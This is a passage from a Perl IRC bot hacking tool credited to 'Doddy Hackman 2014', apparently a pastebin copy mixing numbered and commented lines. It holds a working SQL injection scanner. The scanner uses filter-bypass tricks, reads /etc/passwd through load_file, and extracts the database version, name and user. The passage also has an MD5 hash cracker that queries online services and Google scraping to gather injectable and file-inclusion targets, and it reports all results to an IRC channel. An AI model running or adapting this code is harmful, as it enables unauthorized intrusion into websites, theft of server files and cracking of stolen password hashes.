        ( $pass1, $pass2 ) = &bypass( $ARGV[1] );
        if ( $page =~ /(.*)hackman(.*)/ig ) {
            my $start = $1;
            my $end = $2;

            # Three capability checks: can the database account read
            # information_schema.tables, mysql.user, and files via
            # load_file() (0x2f6574632f706173737764 is hex for /etc/passwd).
            $test1 =
              toma( $start
                  . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
                  . $end
                  . $pass1 . "from"
                  . $pass1
                  . "information_schema.tables"
                  . $pass2 );
            $test2 =
              toma( $start
                  . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
                  . $end
                  . $pass1 . "from"
                  . $pass1
                  . "mysql.user"
                  . $pass2 );
            $test3 =
              toma( $start
                  . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
                  . $end
                  . $pass2 );
            if ( $test2 =~ /ERTOR854/ig ) {
                print $soquete
                  "PRIVMSG $canal : [+] MYSQL User : ON\r\n";
            }
            if ( $test1 =~ /ERTOR854/ig ) {
                print $soquete
                  "PRIVMSG $canal : [+] information_schema : ON\r\n";
            }
            if ( $test3 =~ /ERTOR854/ig ) {
                print $soquete
                  "PRIVMSG $canal : [+] load_file : ON\r\n";
            }

            # Final request: version(), database() and user(), separated by
            # the marker so they can be cut out of the response.
            $code =
              toma( $start
                  . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"
                  . $end
                  . $pass2 );
            if ( $code =~
                /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g )
            {
                print $soquete
                  "PRIVMSG $canal : [!] DB Version : $1\r\n";
                print $soquete "PRIVMSG $canal : [!] DB Name : $2\r\n";
                print $soquete
                  "PRIVMSG $canal : [!] user_name : $3\r\n";
            }
            else {
                print $soquete
                  "PRIVMSG $canal : [-] Not found any data\r\n";
            }
            print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
        }
    }
}
  831.  
  832. }
  833.  
# !locateip handler. Resolves the host part of the given URL, then sends the
# resulting IP address to two third-party lookup sites over plain HTTP and
# relays what it scrapes from their pages to the channel. Nothing is sent to
# the looked-up host itself by this sub.
sub infocon {
    my $target = shift;

    my ( $scheme, $auth, $path, $query, $frag ) = uri_split($target);

    # Only URLs with an authority (host) part are processed.
    if ( $auth ne "" ) {

        # The inner $target (dotted IP) shadows the URL argument.
        my $get = gethostbyname($auth);
        my $target = inet_ntoa($get);

        print $soquete "PRIVMSG $canal : [+] Getting info\r\n";

        # Geolocation lookup; city, country and region are pulled out of the
        # returned HTML with table-cell patterns.
        $total =
          "http://www.melissadata.com/lookups/iplocation.asp?ipaddress=$target";
        $re = toma($total);

        if ( $re =~ /City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
            print $soquete "PRIVMSG $canal : [+] City : $2\r\n";
        }
        else {
            print $soquete "PRIVMSG $canal : [-] Not Found\r\n";
        }
        if ( $re =~ /Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
            print $soquete "PRIVMSG $canal : [+] Country : $2\r\n";
        }
        if ( $re =~
            /State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ )
        {
            print $soquete "PRIVMSG $canal : [+] State or Region : $2\r\n";

        }

        print $soquete "PRIVMSG $canal : [+] Getting Hosts\r\n";

        # Reverse-IP lookup; every host name found in a "whois/" link on the
        # result page is relayed.
        my $code = toma( "http://www.ip-adress.com/reverse_ip/" . $target );

        while ( $code =~ /whois\/(.*?)\">Whois/g ) {
            my $dns = $1;
            chomp $dns;
            print $soquete "PRIVMSG $canal : [DNS] : $dns\r\n";

        }
    }
}
  878.  
  879. } #
  880.  
  881. # Functions
  882.  
# Looks up an MD5 hash on four public web services, one after another, and
# returns the first plaintext scraped from a result page. Returns the
# sentinel string "false01" when none of them yields a match.
# Each lookup is an HTTP POST (see tomar) to an http:// URL, so the hash is
# disclosed in clear to every service that gets queried and to the network
# path in between.
sub crackit {

    my $md5 = shift;
    my $resultado;

    ## www.md5.net

    my $code = tomar(
        "http://www.md5.net/cracker.php",
        { 'hash' => $md5, 'submit' => 'Crack' }
    );

    if ( $code =~ m{<input type="text" id="hash" size="(.*?)" value="(.*?)"/>}
        and $code !~ /Entry not found./mig )
    {

        $resultado = $2;

    }
    else {

        ## md5online.net

        my $code = tomar( "http://md5online.net/index.php",
            { 'pass' => $md5, 'option' => 'hash2text', 'send' => 'Submit' } );

        if ( $code =~
            /<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>/ )
        {
            $resultado = $2;
        }
        else {

            ## md5decryption.com

            my $code = tomar(
                "http://md5decryption.com/index.php",
                { 'hash' => $md5, 'submit' => 'Decrypt It!' }
            );

            if ( $code =~ /Decrypted Text: <\/b>(.*?)<\/font>/ ) {
                $resultado = $1;
            }
            else {

                ## md5.my-addr.com

                my $code = tomar(
                    "http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php",
                    { 'md5' => $md5 }
                );

                if ( $code =~
                    /<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/
                  )
                {
                    $resultado = $1;
                }
                else {
                    # Sentinel tested by the !crackit handler.
                    $resultado = "false01";
                }
            }
        }
    }
    return $resultado;
}
  949.  
  950. sub bypass {
  951. if ( $_[0] eq "/*" ) { return ( "/**/", "/*" ); }
  952. elsif ( $_[0] eq "%20" ) { return ( "%20", "%00" ); }
  953. else { return ( "+", "--" ); }
  954. }
  955.  
  956. sub ascii {
  957. return join ',', unpack "U*", $_[0];
  958. }
  959.  
  960. sub ascii_de {
  961. $_[0] = join q[], map { chr } split q[,], $_[0];
  962. return $_[0];
  963. }
  964.  
  965. sub encode {
  966. my $string = $_[0];
  967. $hex = '0x';
  968. for ( split //, $string ) {
  969. $hex .= sprintf "%x", ord;
  970. }
  971. return $hex;
  972. }
  973.  
  974. sub decode {
  975. $_[0] =~ s/^0x//;
  976. $encode = join q[], map { chr hex } $_[0] =~ /../g;
  977. return $encode;
  978. }
  979.  
# Collects candidate URLs for the !sqlifinder and !rfifinder handlers by
# scraping search-result pages. $a is the search text, $b the highest
# "start" offset to request. All requests go through toma().
# Returns the de-duplicated list produced by repes(cortar(...)).
sub google {
    my ( $a, $b ) = @_;

    # One request per result page: start=10, 20, ... up to $b. The search
    # text is concatenated into the URL as given.
    for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {
        $code = toma(
            "http://www.google.com.ar/search?hl=&q=" . $a . "&start=$pages" );
        my @links = get_links($code);

        # Keep only the "cached copy" links.
        for my $l (@links) {
            if ( $l =~ /webcache.googleusercontent.com/ ) {
                push( @url, $l );
            }
        }
    }

    # Pull the original page address out of each cache link.
    for (@url) {
        if ( $_ =~ /cache:(.*?):(.*?)\+/ ) {
            push( @founds, $2 );
        }
    }

    # The @founds on the right-hand side is the package array filled above;
    # the lexical @founds only exists from the next statement on. Neither
    # @url nor the package @founds is emptied in this sub.
    my @founds = repes( cortar(@founds) );
    return @founds;
}
  1000.  
  1001. sub repes {
  1002. my @limpio;
  1003. foreach $test (@_) {
  1004. push @limpio, $test unless $repe{$test}++;
  1005. }
  1006. return @limpio;
  1007. }
  1008.  
  1009. sub cortar {
  1010. my @nuevo;
  1011. for (@_) {
  1012. if ( $_ =~ /=/ ) {
  1013. @tengo = split( "=", $_ );
  1014. push( @nuevo, @tengo[0] . "=" );
  1015. }
  1016. else {
  1017. push( @nuevo, $_ );
  1018. }
  1019. }
  1020. return @nuevo;
  1021. }
  1022.  
# Parses the HTML in $_[0] with HTML::LinkExtor and returns the link values
# gathered in the package array @links. @links is not emptied here, so it
# also holds the links from earlier calls.
sub get_links {
    $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
    return @links;

    # Callback for HTML::LinkExtor: receives the tag name and its link
    # attributes, and stores every attribute value.
    # A named sub declared inside another sub is still a package-level sub.
    sub agarrar {
        my ( $a, %b ) = @_;
        push( @links, values %b );
    }
}
  1032.  
  1033. sub toma {
  1034. return $nave->get( $_[0] )->content;
  1035. }
  1036.  
  1037. sub tomar {
  1038. my ( $web, $var ) = @_;
  1039. return $nave->post( $web, [ %{$var} ] )->content;
  1040. }
  1041.  
  1042. sub tomados {
  1043. return $nave->get( $_[0] );
  1044. }
  1045.  
  1046. sub tomax {
  1047. return $nave->get( $_[0] );
  1048. }
  1049.  
  1050. sub savefile {
  1051. open( SAVE, ">>" . $_[0] );
  1052. print SAVE $_[1] . "\n";
  1053. close SAVE;
  1054. }
  1055.  
  1056. sub abrir {
  1057. open my $FILE, q[<], "config.txt";
  1058. my $word = join q[], <$FILE>;
  1059. close $FILE;
  1060. return $word;
  1061. }
  1062.  
# Prints the start-up banner. In this copy of the file the banner text is
# blank lines only.
sub head {
    print qq(



);
}
  1070.  
  1071. sub copyright {
  1072. print "\n\n-- == (C) Doddy Hackman 2014 == --\n\n";
  1073. }
  1074.  
  1075. # The End ?